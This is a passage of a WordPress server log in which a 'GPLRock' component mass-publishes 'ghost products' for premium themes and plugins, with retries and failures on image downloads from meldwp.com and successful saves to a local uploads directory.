10:25:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jobclass-job-board-web-application [07-Apr-2026 10:25:10 UTC] GPLRock: Image download failed for product woocommerce-advanced-files-uploader (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:25:12 UTC] GPLRock: Image download failed for product woocommerce-advanced-files-uploader (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:25:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-advanced-files-uploader-14340.webp for product woocommerce-advanced-files-uploader after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:25:14 UTC] GPLRock: Image download failed for product woocommerce-advanced-files-uploader (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:25:16 UTC] GPLRock: Image download failed for product woocommerce-advanced-files-uploader (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:25:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-advanced-files-uploader-14340.webp for product woocommerce-advanced-files-uploader after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:25:18 UTC] GPLRock WARNING: Image download failed for product woocommerce-advanced-files-uploader. URL: https://meldwp.com/wp-content/uploads/woocommerce-advanced-files-uploader-14340.webp [07-Apr-2026 10:25:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-advanced-files-uploader [07-Apr-2026 10:25:18 UTC] GPLRock: Image download failed for product yacht-boat-booking-with-seat-reservation-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:25:20 UTC] GPLRock: Image download failed for product yacht-boat-booking-with-seat-reservation-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:25:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yacht-boat-booking-with-seat-reservation-for-woocommerce-27602.webp for product yacht-boat-booking-with-seat-reservation-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:25:23 UTC] GPLRock: Image download failed for product yacht-boat-booking-with-seat-reservation-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:25:25 UTC] GPLRock: Image download failed for product yacht-boat-booking-with-seat-reservation-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:25:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yacht-boat-booking-with-seat-reservation-for-woocommerce-27602.webp for product yacht-boat-booking-with-seat-reservation-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:25:27 UTC] GPLRock WARNING: Image download failed for product yacht-boat-booking-with-seat-reservation-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/yacht-boat-booking-with-seat-reservation-for-woocommerce-27602.webp [07-Apr-2026 10:25:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: yacht-boat-booking-with-seat-reservation-for-woocommerce [07-Apr-2026 10:25:27 UTC] GPLRock: Image download failed for product smart-market-shortcodes-plugin-for-wordpress-and-envato-market (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:25:29 UTC] GPLRock: Image download failed for product smart-market-shortcodes-plugin-for-wordpress-and-envato-market (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:25:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smart-market-shortcodes---plugin-for-wordpress-and-envato-market-33513.webp for product smart-market-shortcodes-plugin-for-wordpress-and-envato-market after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:25:34 UTC] GPLRock: Image download failed for product smart-market-shortcodes-plugin-for-wordpress-and-envato-market (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:25:36 UTC] GPLRock: Image download failed for product smart-market-shortcodes-plugin-for-wordpress-and-envato-market (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:25:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smart-market-shortcodes---plugin-for-wordpress-and-envato-market-33513.webp for product smart-market-shortcodes-plugin-for-wordpress-and-envato-market after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:25:38 UTC] GPLRock WARNING: Image download failed for product smart-market-shortcodes-plugin-for-wordpress-and-envato-market. URL: https://meldwp.com/wp-content/uploads/smart-market-shortcodes---plugin-for-wordpress-and-envato-market-33513.webp [07-Apr-2026 10:25:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: smart-market-shortcodes-plugin-for-wordpress-and-envato-market [07-Apr-2026 10:55:19 UTC] GPLRock: Image downloaded successfully for product real-category-management-content-management-in-category-folders-in-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-279dcc94.png [07-Apr-2026 10:55:19 UTC] GPLRock: Using pre-downloaded image for product real-category-management-content-management-in-category-folders-in-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-279dcc94.png [07-Apr-2026 10:55:19 UTC] GPLRock: Ghost product published with image - Product ID: real-category-management-content-management-in-category-folders-in-wordpress [07-Apr-2026 10:55:21 UTC] GPLRock: Image downloaded successfully for product tutorgo-education-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4e4a9ab4.jpg [07-Apr-2026 10:55:21 UTC] GPLRock: Using pre-downloaded image for product tutorgo-education-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4e4a9ab4.jpg [07-Apr-2026 10:55:21 UTC] GPLRock: Ghost product published with image - Product ID: tutorgo-education-wordpress-theme [07-Apr-2026 10:55:22 UTC] GPLRock: Image downloaded successfully for product gamipress-birthdays (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4d6f9c4e.jpg [07-Apr-2026 10:55:22 UTC] GPLRock: Using pre-downloaded image for product gamipress-birthdays: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4d6f9c4e.jpg [07-Apr-2026 10:55:22 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-birthdays [07-Apr-2026 10:55:24 UTC] GPLRock: Image downloaded successfully for product gamipress-anniversaries (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f01e8fc1.jpg [07-Apr-2026 10:55:24 UTC] GPLRock: Using pre-downloaded image for product gamipress-anniversaries: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f01e8fc1.jpg [07-Apr-2026 10:55:24 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-anniversaries [07-Apr-2026 10:55:25 UTC] GPLRock: Image downloaded successfully for product gamipress-congratulations-popups (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f3db168c.jpg [07-Apr-2026 10:55:25 UTC] GPLRock: Using pre-downloaded image for product gamipress-congratulations-popups: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f3db168c.jpg [07-Apr-2026 10:55:25 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-congratulations-popups [07-Apr-2026 10:55:26 UTC] GPLRock: Image downloaded successfully for product gamipress-conditional-notifications (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b6f8293b.jpg [07-Apr-2026 10:55:26 UTC] GPLRock: Using pre-downloaded image for product gamipress-conditional-notifications: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b6f8293b.jpg [07-Apr-2026 10:55:26 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-conditional-notifications [07-Apr-2026 10:55:27 UTC] GPLRock: Image downloaded successfully for product gamipress-notifications (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1bb56559.jpg [07-Apr-2026 10:55:28 UTC] GPLRock: Using pre-downloaded image for product gamipress-notifications: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1bb56559.jpg [07-Apr-2026 10:55:28 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-notifications [07-Apr-2026 10:55:29 UTC] GPLRock: Image downloaded successfully for product code-snippets-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e3b448fc.jpg [07-Apr-2026 10:55:29 UTC] GPLRock: Using pre-downloaded image for product code-snippets-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e3b448fc.jpg [07-Apr-2026 10:55:29 UTC] GPLRock: Ghost product published with image - Product ID: code-snippets-pro [07-Apr-2026 10:55:30 UTC] GPLRock: Image downloaded successfully for product mycred-addons-bundle (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3ec603f3.jpg [07-Apr-2026 10:55:30 UTC] GPLRock: Using pre-downloaded image for product mycred-addons-bundle: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3ec603f3.jpg [07-Apr-2026 10:55:30 UTC] GPLRock: Ghost product published with image - Product ID: mycred-addons-bundle [07-Apr-2026 10:55:33 UTC] GPLRock: Image downloaded successfully for product gaia-agriculture-organic-farming-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3d6ad497.png [07-Apr-2026 10:55:33 UTC] GPLRock: Using pre-downloaded image for product gaia-agriculture-organic-farming-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3d6ad497.png [07-Apr-2026 10:55:33 UTC] GPLRock: Ghost product published with image - Product ID: gaia-agriculture-organic-farming-elementor-template-kit [08-Apr-2026 00:58:01 UTC] GPLRock: Image downloaded successfully for product prider-lgbtq-gay-rights-festival-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8f35a2b0.webp [08-Apr-2026 00:58:02 UTC] GPLRock: Using pre-downloaded image for product prider-lgbtq-gay-rights-festival-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8f35a2b0.webp [08-Apr-2026 00:58:02 UTC] GPLRock: Ghost product published with image - Product ID: prider-lgbtq-gay-rights-festival-template-kit [08-Apr-2026 00:58:04 UTC] GPLRock: Image downloaded successfully for product pregnata-pregnancy-care-obstetrician-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a01e1303.jpg [08-Apr-2026 00:58:04 UTC] GPLRock: Using pre-downloaded image for product pregnata-pregnancy-care-obstetrician-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a01e1303.jpg [08-Apr-2026 00:58:04 UTC] GPLRock: Ghost product published with image - Product ID: pregnata-pregnancy-care-obstetrician-elementor-template-kit [08-Apr-2026 00:58:05 UTC] GPLRock: Image downloaded successfully for product pregmom-pediatrician-clinic-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2146d0ae.webp [08-Apr-2026 00:58:05 UTC] GPLRock: Using pre-downloaded image for product pregmom-pediatrician-clinic-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2146d0ae.webp [08-Apr-2026 00:58:05 UTC] GPLRock: Ghost product published with image - Product ID: pregmom-pediatrician-clinic-elementor-template-kit [08-Apr-2026 00:58:07 UTC] GPLRock: Image downloaded successfully for product povulr-modeling-talent-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eb8818a3.jpg [08-Apr-2026 00:58:07 UTC] GPLRock: Using pre-downloaded image for product povulr-modeling-talent-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eb8818a3.jpg [08-Apr-2026 00:58:07 UTC] GPLRock: Ghost product published with image - Product ID: povulr-modeling-talent-agency-elementor-template-kit [08-Apr-2026 00:58:08 UTC] GPLRock: Image downloaded successfully for product potret-photography-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-744894fe.jpg [08-Apr-2026 00:58:08 UTC] GPLRock: Using pre-downloaded image for product potret-photography-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-744894fe.jpg [08-Apr-2026 00:58:09 UTC] GPLRock: Ghost product published with image - Product ID: potret-photography-portfolio-elementor-template-kit [08-Apr-2026 00:58:10 UTC] GPLRock: Image downloaded successfully for product potopath-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ae968bcd.webp [08-Apr-2026 00:58:10 UTC] GPLRock: Using pre-downloaded image for product potopath-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ae968bcd.webp [08-Apr-2026 00:58:10 UTC] GPLRock: Ghost product published with image - Product ID: potopath-digital-agency-elementor-template-kit [08-Apr-2026 00:58:11 UTC] GPLRock: Image downloaded successfully for product poterra-pottery-ceramic-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5b142ad0.webp [08-Apr-2026 00:58:11 UTC] GPLRock: Using pre-downloaded image for product poterra-pottery-ceramic-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5b142ad0.webp [08-Apr-2026 00:58:11 UTC] GPLRock: Ghost product published with image - Product ID: poterra-pottery-ceramic-elementor-template-kit [08-Apr-2026 00:58:13 UTC] GPLRock: Image downloaded successfully for product portostar-personal-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8d9254e1.webp [08-Apr-2026 00:58:13 UTC] GPLRock: Using pre-downloaded image for product portostar-personal-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8d9254e1.webp [08-Apr-2026 00:58:13 UTC] GPLRock: Ghost product published with image - Product ID: portostar-personal-portfolio-elementor-template-kit [08-Apr-2026 00:58:14 UTC] GPLRock: Image downloaded successfully for product portfo-creative-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6bb708aa.webp [08-Apr-2026 00:58:14 UTC] GPLRock: Using pre-downloaded image for product portfo-creative-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6bb708aa.webp [08-Apr-2026 00:58:14 UTC] GPLRock: Ghost product published with image - Product ID: portfo-creative-portfolio-elementor-template-kit [08-Apr-2026 00:58:16 UTC] GPLRock: Image downloaded successfully for product planty-cafe-restaurant-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ee688d50.webp [08-Apr-2026 00:58:16 UTC] GPLRock: Using pre-downloaded image for product planty-cafe-restaurant-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ee688d50.webp [08-Apr-2026 00:58:16 UTC] GPLRock: Ghost product published with image - Product ID: planty-cafe-restaurant-template-kit [09-Apr-2026 00:59:51 UTC] GPLRock: Image downloaded successfully for product studiopress-smart-passive-income-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-42891009.jpg [09-Apr-2026 00:59:51 UTC] GPLRock: Using pre-downloaded image for product studiopress-smart-passive-income-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-42891009.jpg [09-Apr-2026 00:59:51 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-smart-passive-income-pro-genesis-wordpress-theme [09-Apr-2026 00:59:52 UTC] GPLRock: Image downloaded successfully for product css-igniter-vignette-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3611af52.jpg [09-Apr-2026 00:59:52 UTC] GPLRock: Using pre-downloaded image for product css-igniter-vignette-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3611af52.jpg [09-Apr-2026 00:59:52 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-vignette-wordpress-theme [09-Apr-2026 00:59:53 UTC] GPLRock: Image downloaded successfully for product moose-creative-multipurpose-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-75d40e49.jpg [09-Apr-2026 00:59:53 UTC] GPLRock: Using pre-downloaded image for product moose-creative-multipurpose-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-75d40e49.jpg [09-Apr-2026 00:59:53 UTC] GPLRock: Ghost product published with image - Product ID: moose-creative-multipurpose-theme [09-Apr-2026 00:59:54 UTC] GPLRock: Image downloaded successfully for product woocommerce-url-coupons (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-787721d4.jpg [09-Apr-2026 00:59:54 UTC] GPLRock: Using pre-downloaded image for product woocommerce-url-coupons: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-787721d4.jpg [09-Apr-2026 00:59:54 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-url-coupons [09-Apr-2026 00:59:54 UTC] GPLRock: Image downloaded successfully for product the-next-mag-ultimate-magazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-70f02ae8.jpg [09-Apr-2026 00:59:54 UTC] GPLRock: Using pre-downloaded image for product the-next-mag-ultimate-magazine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-70f02ae8.jpg [09-Apr-2026 00:59:54 UTC] GPLRock: Ghost product published with image - Product ID: the-next-mag-ultimate-magazine-wordpress-theme [09-Apr-2026 00:59:55 UTC] GPLRock: Image downloaded successfully for product woocommerce-sale-flash-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ccff51bb.jpg [09-Apr-2026 00:59:56 UTC] GPLRock: Image downloaded successfully for product memberpress-getresponse (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c448ab1c.jpg [09-Apr-2026 00:59:56 UTC] GPLRock: Using pre-downloaded image for product woocommerce-sale-flash-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ccff51bb.jpg [09-Apr-2026 00:59:56 UTC] GPLRock: Using pre-downloaded image for product memberpress-getresponse: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c448ab1c.jpg [09-Apr-2026 00:59:56 UTC] GPLRock: Ghost product published with image - Product ID: memberpress-getresponse [09-Apr-2026 00:59:56 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-sale-flash-pro [09-Apr-2026 00:59:57 UTC] GPLRock: Image downloaded successfully for product woocommerce-shipwire (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8bdcf423.jpg [09-Apr-2026 00:59:57 UTC] GPLRock: Using pre-downloaded image for product woocommerce-shipwire: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8bdcf423.jpg [09-Apr-2026 00:59:57 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-shipwire [09-Apr-2026 00:59:57 UTC] GPLRock: Image downloaded successfully for product astero-wordpress-weather-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-96dd358a.jpg [09-Apr-2026 00:59:57 UTC] GPLRock: Using pre-downloaded image for product astero-wordpress-weather-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-96dd358a.jpg [09-Apr-2026 00:59:57 UTC] GPLRock: Ghost product published with image - Product ID: astero-wordpress-weather-plugin [09-Apr-2026 00:59:58 UTC] GPLRock: Image downloaded successfully for product woocommerce-freshdesk (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-19ab291a.jpg [09-Apr-2026 00:59:58 UTC] GPLRock: Using pre-downloaded image for product woocommerce-freshdesk: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-19ab291a.jpg [09-Apr-2026 00:59:58 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-freshdesk [09-Apr-2026 00:59:59 UTC] GPLRock: Image downloaded successfully for product woocommerce-flat-rate-box-shipping (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a57ffd0f.jpg [09-Apr-2026 00:59:59 UTC] GPLRock: Using pre-downloaded image for product woocommerce-flat-rate-box-shipping: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a57ffd0f.jpg [09-Apr-2026 00:59:59 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-flat-rate-box-shipping [09-Apr-2026 01:00:00 UTC] GPLRock: Image downloaded successfully for product loginpress-login-redirect (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f8f92203.jpg [09-Apr-2026 01:00:00 UTC] GPLRock: Using pre-downloaded image for product loginpress-login-redirect: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f8f92203.jpg [09-Apr-2026 01:00:00 UTC] GPLRock: Ghost product published with image - Product ID: loginpress-login-redirect [09-Apr-2026 01:00:01 UTC] GPLRock: Image downloaded successfully for product wp-project-manager-pro-woocommerce-order-extension (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cde99c57.jpg [09-Apr-2026 01:00:01 UTC] GPLRock: Using pre-downloaded image for product wp-project-manager-pro-woocommerce-order-extension: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cde99c57.jpg [09-Apr-2026 01:00:01 UTC] GPLRock: Ghost product published with image - Product ID: wp-project-manager-pro-woocommerce-order-extension [09-Apr-2026 01:00:01 UTC] GPLRock: Image downloaded successfully for product team-showcase-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-233cdc16.jpg [09-Apr-2026 01:00:01 UTC] GPLRock: Using pre-downloaded image for product team-showcase-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-233cdc16.jpg [09-Apr-2026 01:00:01 UTC] GPLRock: Ghost product published with image - Product ID: team-showcase-wordpress-plugin [09-Apr-2026 01:00:02 UTC] GPLRock: Image downloaded successfully for product mainwp-links-manager (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a75f9d25.jpg [09-Apr-2026 01:00:02 UTC] GPLRock: Using pre-downloaded image for product mainwp-links-manager: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a75f9d25.jpg [09-Apr-2026 01:00:02 UTC] GPLRock: Ghost product published with image - Product ID: mainwp-links-manager [09-Apr-2026 01:00:03 UTC] GPLRock: Image downloaded successfully for product ultimate-member-online-users-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5711223b.jpg [09-Apr-2026 01:00:03 UTC] GPLRock: Using pre-downloaded image for product ultimate-member-online-users-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5711223b.jpg [09-Apr-2026 01:00:03 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-member-online-users-addon [09-Apr-2026 01:00:04 UTC] GPLRock: Image downloaded successfully for product mythemeshop-hotnews-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aef4a97c.jpg [09-Apr-2026 01:00:04 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-hotnews-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aef4a97c.jpg [09-Apr-2026 01:00:04 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-hotnews-wordpress-theme [09-Apr-2026 01:00:04 UTC] GPLRock: Image downloaded successfully for product studiopress-aspire-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d90b482e.jpg [09-Apr-2026 01:00:04 UTC] GPLRock: Using pre-downloaded image for product studiopress-aspire-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d90b482e.jpg [09-Apr-2026 01:00:04 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-aspire-pro-genesis-wordpress-theme [09-Apr-2026 01:00:06 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-marketpress-ecommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f81afb78.jpg [09-Apr-2026 01:00:06 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-marketpress-ecommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f81afb78.jpg [09-Apr-2026 01:00:06 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-marketpress-ecommerce [09-Apr-2026 01:00:06 UTC] GPLRock: Image downloaded successfully for product woocommerce-paypal-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bcf0ab59.jpg [09-Apr-2026 01:00:06 UTC] GPLRock: Using pre-downloaded image for product woocommerce-paypal-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bcf0ab59.jpg [09-Apr-2026 01:00:06 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-paypal-pro [09-Apr-2026 01:43:06 UTC] GPLRock: Image download failed for product emporium-material-design-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:43:08 UTC] GPLRock: Image download failed for product emporium-material-design-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:43:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/emporium---material-design-ecommerce-wordpress-theme-12787.webp for product emporium-material-design-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Apr-2026 01:43:10 UTC] GPLRock: Image download failed for product emporium-material-design-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:43:12 UTC] GPLRock: Image download failed for product emporium-material-design-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:43:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/emporium---material-design-ecommerce-wordpress-theme-12787.webp for product emporium-material-design-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Apr-2026 01:43:14 UTC] GPLRock WARNING: Image download failed for product emporium-material-design-ecommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/emporium---material-design-ecommerce-wordpress-theme-12787.webp [09-Apr-2026 01:43:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: emporium-material-design-ecommerce-wordpress-theme [09-Apr-2026 01:43:15 UTC] GPLRock: Image download failed for product h-code-multipurpose-onepage-multi-page-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:43:17 UTC] GPLRock: Image download failed for product h-code-multipurpose-onepage-multi-page-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:43:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/h-code-multipurpose-onepage--multi-page-template-22645.webp for product h-code-multipurpose-onepage-multi-page-template after 3 attempts. HTTP Code: 526, Error: [09-Apr-2026 01:43:19 UTC] GPLRock: Image download failed for product h-code-multipurpose-onepage-multi-page-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:43:21 UTC] GPLRock: Image download failed for product h-code-multipurpose-onepage-multi-page-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:43:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/h-code-multipurpose-onepage--multi-page-template-22645.webp for product h-code-multipurpose-onepage-multi-page-template after 3 attempts. HTTP Code: 526, Error: [09-Apr-2026 01:43:23 UTC] GPLRock WARNING: Image download failed for product h-code-multipurpose-onepage-multi-page-template. URL: 